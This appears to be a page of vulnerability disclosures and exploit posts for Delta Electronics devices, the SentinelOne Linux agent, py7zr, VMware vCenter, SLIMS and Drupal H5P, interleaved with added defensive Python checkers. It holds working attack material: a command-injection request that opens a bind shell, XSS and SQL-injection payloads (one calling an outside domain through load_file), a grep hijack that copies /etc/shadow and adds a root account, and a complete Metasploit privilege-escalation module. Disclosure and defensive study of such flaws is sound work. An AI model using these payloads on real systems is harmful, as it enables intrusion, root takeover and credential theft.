<pre><code>CyberDanube Security Research 20221130-1<br />-------------------------------------------------------------------------------<br />              title| Authenticated Command Injection<br />            product| Delta Electronics DVW-W02W2-E2<br /> vulnerable version| V2.42<br />      fixed version| V2.5.2<br />         CVE number| -<br />             impact| High<br />           homepage| https://www.deltaww.com<br />              found| 2022-08-01<br />                 by| T. Weber (Office Vienna)<br />                   | CyberDanube Security Research<br />                   | Vienna | St. Pölten<br />                   |<br />                   | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Delta, founded in 1971, is a global provider of power and thermal management<br />solutions. Its mission statement, "To provide innovative, clean and<br />energy-efficient solutions for a better tomorrow," focuses on addressing key<br />environmental issues such as global climate change. As an energy-saving<br />solutions provider with core competencies in power electronics and automation,<br />Delta's business categories include Power Electronics, Automation, and<br />Infrastructure."<br /><br />Source: https://www.deltaww.com/en-US/about/aboutProfile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />DVW-W02W2-E2 / V2.42<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating system of<br />the device, with all implications. If such a device acts as a key device in an<br />industrial network, or controls various critical equipment via serial ports, an<br />attacker can do more extensive damage in the corresponding network.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server is prone to an authenticated command injection via POST<br />parameters. This is only possible if the "timestamp" parameter is set correctly<br />in the URL. The following proof-of-concept shows how to open a bind shell on<br />port 8889 with a "utelnetd" listener:<br />===============================================================================<br />POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1<br />Host: 192.168.3.148<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 105<br />Origin: http://192.168.3.148<br />Connection: close<br />Referer: http://192.168.3.148/MT_ping.htm<br />Cookie: xxid=1973719449<br />Upgrade-Insecure-Requests: 1<br /><br />submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`<br />===============================================================================<br /><br />To access the shell, "netcat" can be used:<br />===============================================================================<br />$ nc 192.168.3.150 8889<br />[telnet negotiation bytes]<br /><br />BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)<br />Enter 'help' for a list of built-in commands.<br /><br />/ #<br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version V2.5.2.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that Delta Electronics customers upgrade the firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacted Delta Electronics.<br />2022-08-10: Vendor requested the advisory without encryption; sent advisory to<br />            Delta Electronics.<br />2022-08-16: Security contact asked a few questions regarding responsible<br />            disclosure; sent answers.<br />2022-08-30: Asked for an update.<br />2022-09-01: Vendor responded that they will need more time to resolve the<br />            issues; provided an additional 30 days (until 2022-11-02) for<br />            patching.<br />2022-10-11: Asked for an update.<br />2022-10-12: Vendor responded that fixing will be done 2022-11-15; shifted the<br />            release date to this date.<br />2022-10-16: Vendor shifted the release date again to 2022-11-18. Shifted the<br />            advisory release date to the same day.<br />2022-10-17: Asked for an update regarding the release; no answer.<br />2022-10-18: Asked for an update and shifted the release date to 2022-10-22.<br />2022-10-19: Vendor responded that there were problems releasing the patch.<br />            Contact stated that the patch will be delayed until the end of<br />            November.<br />2022-10-21: Asked vendor for a concrete release date; no answer.<br />2022-10-28: Announced advisory release date of 2022-10-30 to vendor.<br />2022-10-29: Found firmware patches with issue date 2022-11-25 on the vendor's<br />            website.<br />2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>CyberDanube Security Research 20221130-0<br />-------------------------------------------------------------------------------<br />              title| Multiple Vulnerabilities<br />            product| Delta Electronics DX-2100-L1-CN<br /> vulnerable version| V1.5.0.10<br />      fixed version| V1.5.0.12<br />         CVE number| -<br />             impact| High<br />           homepage| https://www.deltaww.com<br />              found| 2022-08-01<br />                 by| T. Weber (Office Vienna)<br />                   | CyberDanube Security Research<br />                   | Vienna | St. Pölten<br />                   |<br />                   | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Delta, founded in 1971, is a global provider of power and thermal management<br />solutions. Its mission statement, "To provide innovative, clean and<br />energy-efficient solutions for a better tomorrow," focuses on addressing key<br />environmental issues such as global climate change. As an energy-saving<br />solutions provider with core competencies in power electronics and automation,<br />Delta's business categories include Power Electronics, Automation, and<br />Infrastructure."<br /><br />Source: https://www.deltaww.com/en-US/about/aboutProfile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />DX-2100-L1-CN / V1.5.0.10<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />An authenticated command injection has been identified in the web configuration<br />service of the device. It can be used to execute system commands on the<br />device's OS in the context of the user "root". Therefore, a full compromise of<br />the device is possible with credentials for the web service only.<br /><br />2) Stored Cross-Site Scripting<br />A stored cross-site scripting vulnerability has been identified in the function<br />"net diagnosis" of the device's web configuration service. This can be<br />exploited in the context of a victim's session.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The parameter "diagnose_address" contains the payload ";ls /;", which prints<br />the content of the root directory to the serial console of the device.<br /><br />http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/;<br /><br />The output can be seen in the context of a virtualized firmware clone, as used<br />to find this vulnerability, but is usually invisible to a customer. Therefore,<br />a more visible payload is a command that interacts via the network, like<br />";ping 192.168.0.10;". This command pings the device with the corresponding IP<br />address within the local network.<br /><br />2) Stored Cross-Site Scripting<br />The following request stores JavaScript that prints the cookies of the current<br />user's session to the screen. The script is stored on the device permanently.<br />===============================================================================<br />POST /lform/urlfilter?action=save HTTP/1.1<br />Host: 192.168.3.150<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 190<br />Connection: keep-alive<br />Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30<br /><br />lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1<br />===============================================================================<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to firmware version V1.5.0.12.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that Delta Electronics customers upgrade the firmware to<br />the latest version available.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-08-02: Contacted Delta Electronics.<br />2022-08-10: Vendor requested the advisory without encryption; sent advisory to<br />            Delta Electronics.<br />2022-08-16: Security contact asked a few questions regarding responsible<br />            disclosure; sent answers.<br />2022-08-30: Asked for an update.<br />2022-09-01: Vendor responded that they will need more time to resolve the<br />            issues; provided an additional 30 days (until 2022-11-02) for<br />            patching.<br />2022-10-11: Asked for an update.<br />2022-10-12: Vendor responded that fixing will be done 2022-11-15; shifted the<br />            release date to this date.<br />2022-10-16: Vendor shifted the release date again to 2022-11-18. Shifted the<br />            advisory release date to the same day.<br />2022-10-17: Asked for an update regarding the release; no answer.<br />2022-10-18: Asked for an update and shifted the release date to 2022-10-22.<br />2022-10-19: Vendor responded that there were problems releasing the patch.<br />            Contact stated that the patch will be delayed until the end of<br />            November.<br />2022-10-21: Asked vendor for a concrete release date; no answer.<br />2022-10-28: Announced advisory release date of 2022-10-30 to vendor.<br />2022-10-29: Found firmware patches with issue date 2022-11-25 on the vendor's<br />            website.<br />2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
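Both Delta advisories above describe the same defect: a user-supplied host (the `destination` and `diagnose_address` parameters) is spliced into a command line that a shell interprets. The following added example is not the vendor's code (the device firmware is not shown on this page); it models the handler in Python with the advisory's parameter names, shows the concatenation that makes the injection possible next to a hardened handler that validates the target and invokes the tool without a shell. The `diagnose_type` 1 entry is an assumed second diagnostic added for illustration.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens (no leading or
# trailing hyphen) joined by dots.  Anything else is not a diagnostic target.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")

# Fixed argv prefix per diagnostic type.  Type 0 is "ping", matching the
# diagnose_type=0 request in the DX-2100 advisory; type 1 is an assumed
# second diagnostic used only for illustration.
_TOOLS = {
    0: ["ping", "-c", "3"],
    1: ["traceroute", "-m", "15"],
}


def vulnerable_command(diagnose_address: str) -> str:
    """The pattern both advisories describe: the request parameter is pasted
    into a command string that is later handed to /bin/sh.  The string is only
    returned here, never executed, so the effect of ';' or backticks is visible."""
    return "ping -c 3 " + diagnose_address


def is_valid_target(value: str) -> bool:
    """Accept an IPv4/IPv6 literal or an RFC 1123 hostname, nothing else."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def build_diagnose_argv(diagnose_type: int, diagnose_address: str) -> list:
    """Build the argv list for a diagnostic request.

    Raises ValueError for unknown types or for targets that fail validation,
    so ';ls /;' or a backticked utelnetd command never reaches any process.
    The target is a separate argv element placed after '--', so it can neither
    be split by a shell nor be parsed as an option.
    """
    if diagnose_type not in _TOOLS:
        raise ValueError(f"unknown diagnose_type {diagnose_type!r}")
    if not is_valid_target(diagnose_address):
        raise ValueError("diagnose_address is not an IP address or hostname")
    return [*_TOOLS[diagnose_type], "--", diagnose_address]


def run_diagnose(diagnose_type: int, diagnose_address: str) -> str:
    """Run the diagnostic without a shell and return its combined output."""
    argv = build_diagnose_argv(diagnose_type, diagnose_address)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # What the vulnerable concatenation would have handed to the shell:
    print(vulnerable_command(";ls /;"))
    # The hardened path refuses the same input:
    try:
        build_diagnose_argv(0, ";ls /;")
    except ValueError as err:
        print("rejected:", err)
    print(build_diagnose_argv(0, "192.168.0.10"))
```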
<pre><code>Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability<br />Date: 12/06/2022<br />Exploit Author: ouch_this_hurts<br />Vendor Homepage: https://www.sentinelone.com/<br />Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas<br />Version: 22.3.2.5<br />Tested on: Ubuntu 22.04.x<br />CVE: NA<br /><br />Not enough AI in the world can help you write secure software, it seems? The vendor doesn't make reporting vulnerabilities easy, so to exploit-db it goes :)<br /><br />Protips:<br />- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.<br />- If you require me to use HackerOne, I'm not going to bother.<br />- If you don't have a security.txt, how do you expect me to contact you?<br /><br />Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:<br /><br />Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!<br /><br />PoC below:<br />1. Find the system's "earliest" `PATH` entry, or just override it to whatever you want in `/etc/environment` with some other staged exploit.<br />2. Create the following `grep` file in that directory and make sure it's executable:<br /><br />   ```shell<br />   cat << SENTINELOOPS > /usr/local/bin/grep<br />   #!/bin/bash<br />   # I think I'll have the passwds pl0x<br />   cat /etc/shadow > /tmp/etc_shadow<br /><br />   # password is password :)<br />   echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd<br />   SENTINELOOPS<br /><br />   chmod +x /usr/local/bin/grep<br />   ```<br /><br />3. Wait for the machine to reboot, then log in as `sentinel_oops:password` :)<br /><br />   ```<br />   $ su sentinel_oops<br />   Password: <br />   # whoami <br />   root<br />   ```<br /><br />What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.<br /><br />So there are potentially other ways of privilege escalation via this "agent"?<br />- `grep` as demonstrated above<br />- `pgrep` examining the binary appears to be vulnerable<br />- `xargs` examining the binary appears to be vulnerable<br />- `cat` examining the binary appears to be vulnerable<br />- `ldd` examining the binary appears to be vulnerable<br />- `lsmod` examining the binary appears to be vulnerable<br />- `mksh` examining the binary appears to be vulnerable<br />- `awk` examining the binary appears to be vulnerable<br /><br />[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)<br /></code></pre>
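The root cause in the post above is CWE-427: a root process resolves `grep` (and the other tools listed) through an inherited PATH instead of a fixed set of trusted directories. The following added audit script is mine, not SentinelOne's; it takes the PATH value and a stat-like lookup as inputs so it can run against a constructed directory table (embedded below) or a live host, reports which PATH entries an unprivileged user could use to plant a binary, and shows how a privileged service should resolve a tool instead. The `TRUSTED_DIRS` policy is an assumption, not a vendor setting.

```python
import os
import stat
from typing import Callable, Optional, Tuple

# Lookup returning (owner uid, group gid, st_mode), or None if the path does
# not exist.  Passing it in keeps the policy logic testable without a filesystem.
StatFn = Callable[[str], Optional[Tuple[int, int, int]]]

# Directories a root-run service may legitimately search (assumed policy).
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def os_stat(path: str) -> Optional[Tuple[int, int, int]]:
    """Real lookup for use on a live host."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return st.st_uid, st.st_gid, st.st_mode


def hijackable_dirs(path_value: str, stat_fn: StatFn = os_stat,
                    root_gid: int = 0) -> list:
    """Return PATH entries, in search order, that an unprivileged user could use
    to shadow a tool such as `grep` for a root process:

    * an empty or relative entry (resolved against the process's cwd),
    * a missing directory (anyone who can create it later wins),
    * a directory not owned by root, or writable by a non-root group, or
      world-writable without the sticky bit.
    """
    found = []
    for entry in path_value.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            found.append(entry or ".")
            continue
        info = stat_fn(entry)
        if info is None:
            found.append(entry)
            continue
        uid, gid, mode = info
        group_writable = bool(mode & stat.S_IWGRP) and gid != root_gid
        other_writable = bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)
        if uid != 0 or group_writable or other_writable:
            found.append(entry)
    return found


def resolve_trusted(tool: str, stat_fn: StatFn = os_stat) -> str:
    """Resolve a tool against TRUSTED_DIRS only, never the inherited PATH, and
    only accept a root-owned executable.  A privileged service should exec the
    returned absolute path with an explicit argv (no `sh -c "grep ..."`), so a
    `grep` planted in /usr/local/bin by a local user is never consulted."""
    for d in TRUSTED_DIRS:
        candidate = os.path.join(d, tool)
        info = stat_fn(candidate)
        if info is not None and info[0] == 0 and info[2] & stat.S_IXUSR:
            return candidate
    raise FileNotFoundError(f"{tool!r} not found in trusted directories")


# Constructed directory table standing in for a host: a user-owned
# /usr/local/bin, a world-writable /opt/tools and a sticky /tmp.
SAMPLE_TREE = {
    "/usr/bin": (0, 0, 0o40755),
    "/usr/bin/grep": (0, 0, 0o100755),
    "/usr/local/bin": (1000, 1000, 0o40755),
    "/opt/tools": (0, 0, 0o40777),
    "/tmp": (0, 0, 0o41777),
}
SAMPLE_PATH = "/usr/local/bin:/usr/bin:/opt/tools:/tmp:/nonexistent:"


def sample_stat(path: str) -> Optional[Tuple[int, int, int]]:
    return SAMPLE_TREE.get(path)


if __name__ == "__main__":
    print("hijackable:", hijackable_dirs(SAMPLE_PATH, sample_stat))
    print("grep resolves to:", resolve_trusted("grep", sample_stat))
    # On a live host, audit the PATH a service actually inherits:
    print("live:", hijackable_dirs(os.environ.get("PATH", "")))
```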
<pre><code>CVE-2022-44900: path traversal vulnerability in py7zr<br /><br />A directory traversal vulnerability in the SevenZipFile.extractall() function of<br />the Python library py7zr version 0.20.0 and earlier allows attackers to read<br />arbitrary files on the local machine via malicious 7z file extraction.<br /><br />CVE-2022-44900 <https://www.cve.org/CVERecord?id=CVE-2022-44900><br />allows attackers to achieve arbitrary file read and arbitrary file write. To<br />do so, an attacker needs to create a malicious 7z archive containing a symlink<br />to achieve an arbitrary file read and a file with a path traversal payload as<br />name to achieve an arbitrary file write.<br /><br />Exploiting<br /><br />The script used for tests is the following:<br /><br />import py7zr<br />import click<br /><br /><br />@click.command()<br />@click.argument("filename")<br />def main_procedure(filename):<br />    # extractall() writes into the current directory without checking<br />    # member names or symlink targets (the vulnerable call)<br />    with py7zr.SevenZipFile(filename, 'r') as archive:<br />        archive.extractall()<br /><br /><br />main_procedure()<br /><br />The vulnerable function targeted is py7zr.SevenZipFile.extractall().<br /><br />A lab setup has been built to test for vulnerabilities. Directories<br />structured as follows were used:<br /><br />├── start_point<br />│   ├── archive.7z<br />│   └── py7zr_test.py<br />└── target<br />    ├── write<br />    └── read<br /><br />The start_point directory contains the script used for tests and the<br />malicious archive containing the path traversal payload in the form of the<br />filename of an archived file.<br /><br />To achieve an arbitrary file write, one of the files in the archive needs<br />to have ../target/write set as its name. The content of the file will be<br />written into target/write.<br /><br />In a similar way, to achieve an arbitrary file read, a symlink pointing to<br />../target/read needs to be present in the archive. When extracted, the<br />symlink will consist of the content of target/read.<br /><br />Disclosure timeline<br /><br />29/10/2022 - Maintainer was notified privately of the vulnerabilities<br />30/10/2022 - Response from maintainer<br />01/11/2022 - Release of patched version 0.20.1<br />01/11/2022 - CVE ID request<br />06/12/2022 - CVE ID obtained<br />06/12/2022 - Public disclosure<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br />  Rank = ManualRanking<br /><br />  include Msf::Post::Linux::Priv<br />  include Msf::Post::File<br />  include Msf::Exploit::EXE<br />  include Msf::Exploit::FileDropper<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'VMware vCenter vScalation Priv Esc',<br />        'Description' => %q{<br />          This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the<br />          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the<br />          cis group to write to the file, which will execute as root on vmware-vmon service<br />          restart or host reboot.<br /><br />          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.<br />          The following versions should be vulnerable:<br />          vCenter 7.0 before U2c<br />          vCenter 6.7 before U3o<br />          vCenter 6.5 before U3q<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'h00die', # msf module<br />          'Yuval Lazar' # original PoC, analysis<br />        ],<br />        'Platform' => [ 'linux' ],<br />        'Arch' => [ ARCH_X86, ARCH_X64 ],<br />        'SessionTypes' => [ 'shell', 'meterpreter' ],<br />        'Targets' => [[ 'Auto', {} ]],<br />        'Privileged' => true,<br />        'References' => [<br />          [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ],<br />          [ 'CVE', '2021-22015' ],<br />          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ]<br />        ],<br />        'DisclosureDate' => '2021-09-21',<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'WfsDelay' => 1800 # 30min<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SERVICE_DOWN],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS],<br />          'AKA' => ['vScalation']<br />        }<br />      )<br />    )<br />    register_advanced_options [<br />      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br />    ]<br />  end<br /><br />  # Simplify pulling the writable directory variable<br />  def base_dir<br />    datastore['WritableDir'].to_s<br />  end<br /><br />  def java_wrapper_vmon<br />    '/usr/lib/vmware-vmon/java-wrapper-vmon'<br />  end<br /><br />  def check<br />    group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"")<br />    if writable?(java_wrapper_vmon) && group_owner == 'cis'<br />      return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group")<br />    end<br /><br />    CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable")<br />  end<br /><br />  def exploit<br />    # Check if we're already root<br />    if is_root? && !datastore['ForceExploit']<br />      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br />    end<br /><br />    # Make sure we can write our exploit and payload to the local system<br />    unless writable? base_dir<br />      fail_with Failure::BadConfig, "#{base_dir} is not writable"<br />    end<br /><br />    # backup the original file<br />    @backup = read_file(java_wrapper_vmon)<br />    path = store_loot(<br />      'java-wrapper-vmon.text',<br />      'text/plain',<br />      rhost,<br />      @backup,<br />      'java-wrapper-vmon.text'<br />    )<br />    print_good("Original #{java_wrapper_vmon} backed up to #{path}")<br /><br />    # Upload payload executable<br />    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br />    print_status("Writing payload to #{payload_path}")<br />    upload_and_chmodx payload_path, generate_payload_exe<br />    register_files_for_cleanup payload_path<br /><br />    # write trojaned file<br />    # we want to write our payload towards the top to ensure it gets run<br />    # writing it at the bottom of the file results in the payload not being run<br />    print_status("Writing trojaned #{java_wrapper_vmon}")<br />    write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n"))<br /><br />    # try to restart the service<br />    print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)')<br />    service_restart = cmd_exec('systemctl restart vmware-vmon.service')<br />    # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files<br />    if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed')<br />      print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.')<br />    end<br />    print_status("Waiting #{datastore['WfsDelay']} seconds for shell")<br />  end<br /><br />  def cleanup<br />    unless @backup.nil?<br />      print_status("Replacing trojaned #{java_wrapper_vmon} with original")<br />      write_file(java_wrapper_vmon, @backup)<br />    end<br />    super<br />  end<br />end<br /></code></pre>
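The module above depends on two observable conditions: the wrapper is group-writable by `cis`, and a trojaned copy carries an extra line directly after the `#!/bin/sh` shebang that backgrounds a program from the writable directory (`/tmp` by default). The following added checker is mine, not VMware's or the module's code; it evaluates both conditions on values passed in, with constructed file contents and mode bits that mirror what the module writes, and includes a live-host entry point for a vCenter appliance.

```python
import re
import stat

WRAPPER = "/usr/lib/vmware-vmon/java-wrapper-vmon"   # path named in the module

# Directories a launcher line in the wrapper is not expected to come from.
# WritableDir defaults to /tmp in the module; the others are common scratch dirs.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
_BG_LAUNCH = re.compile(r"^\s*(\S+)\s*&\s*$")   # "<program> &" alone on a line


def wrapper_mode_is_exploitable(mode: int, group_name: str) -> bool:
    """True under the same conditions the module's check() reports 'Appears':
    the file belongs to group 'cis' and that group may write to it."""
    return group_name == "cis" and bool(mode & stat.S_IWGRP)


def find_injected_launchers(content: str, window: int = 5) -> list:
    """Return lines among the first `window` lines that background a program
    from a suspect directory.  The module inserts '<payload> &' right after
    the shebang, so the top of the file is where such a line would sit."""
    hits = []
    for line in content.splitlines()[:window]:
        m = _BG_LAUNCH.match(line)
        if m and m.group(1).startswith(SUSPECT_DIRS):
            hits.append(line.strip())
    return hits


def assess(mode: int, group_name: str, content: str) -> dict:
    """Combine both checks into one verdict for the wrapper file."""
    return {
        "path": WRAPPER,
        "group_writable_by_cis": wrapper_mode_is_exploitable(mode, group_name),
        "injected_launchers": find_injected_launchers(content),
    }


# Constructed wrapper contents: a clean shape and one carrying the kind of
# line the module writes (random dot-file name under /tmp, backgrounded).
CLEAN_WRAPPER = "#!/bin/sh\n# vmware-vmon java wrapper (constructed)\nexec java \"$@\"\n"
TROJANED_WRAPPER = "#!/bin/sh\n/tmp/.kq3Zp8 &\n# vmware-vmon java wrapper (constructed)\nexec java \"$@\"\n"


if __name__ == "__main__":
    print(assess(0o100775, "cis", TROJANED_WRAPPER))
    print(assess(0o100755, "root", CLEAN_WRAPPER))
    # Live check on a Linux appliance: read the real mode, group and content.
    import grp
    import os
    try:
        st = os.stat(WRAPPER)
        with open(WRAPPER, encoding="utf-8", errors="replace") as fh:
            print(assess(st.st_mode, grp.getgrgid(st.st_gid).gr_name, fh.read()))
    except FileNotFoundError:
        print(f"{WRAPPER} not present on this host")
```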
<pre><code>## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi<br />## Author: nu11secur1ty<br />## Date: 12.06.2022<br />## Vendor: https://slims.web.id/web/<br />## Software: https://slims.web.id/web/news/rilis-9.5.1/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1<br /><br />## Description:<br />The manual insertion `point 4` appears to be vulnerable to SQL<br />injection attacks.<br />The payload '+(select<br />load_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+'<br />was submitted in the manual insertion `point 4` testing.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can execute a very dangerous `subquery` to view very<br />sensitive information.<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Payload:<br /><br />```http<br />GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa HTTP/1.1<br />Host: pwnedhost.com<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1; SenayanMember=schm4nbtgbb5i1tbeonr6cav3u<br />Connection: close<br /><br />```<br />[+] Response:<br /><br />```http<br />HTTP/1.1 200 OK<br />Date: Tue, 06 Dec 2022 13:51:38 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Frame-Options: SAMEORIGIN<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-XSS-Protection: 1; mode=block<br />Content-Length: 4120<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />[4120-byte HTML "Loan Report by Class" page omitted; it echoes the injected<br />class value bbbb'+(select*from(select(sleep(5)))a)+' in the page heading and<br />in every classification row of the report table]<br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/gthu91)<br /><br />## Time spent<br />`04:00:00`<br /><br /></code></pre>
<pre><code>------------------------------------------------------------------<br />Drupal H5P Module <= 2.0.0 (isValidPackage) Zip Slip Vulnerability<br />------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.drupal.org/project/h5p<br /><br /><br />[-] Affected Versions:<br /><br />Version 2.0.0-alpha2 and prior versions.<br />Version 7.x-1.50 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located within the H5PValidator::isValidPackage() <br />method. This implements the following check in order to skip any file or <br />folder starting with a dot or underscore within the uploaded h5p <br />archive:<br /><br />$fileName = $zip->statIndex($i)['name'];<br /><br />if (preg_match('/(^[\._]|\/[\._])/', $fileName) !== 0) {<br />  continue; // Skip any file or folder starting with a . or _<br />}<br /><br />This regex check should be enough to prevent path traversal attacks <br />through zipped filenames (Zip Slip attacks), because every "../" <br />sequence contains the string "/." that the check rejects. However, the <br />vulnerability exists if Drupal is running on a Windows server, because <br />in this case an attacker can provide a malicious h5p archive containing <br />a filename with path traversal sequences like "..\..\..", which bypass <br />the above regex check.<br />This can be exploited to write (or overwrite) semi-arbitrary files in <br />the file system via directory traversal sequences, potentially leading <br />to Stored Cross-Site Scripting (XSS) and other kinds of attacks.<br 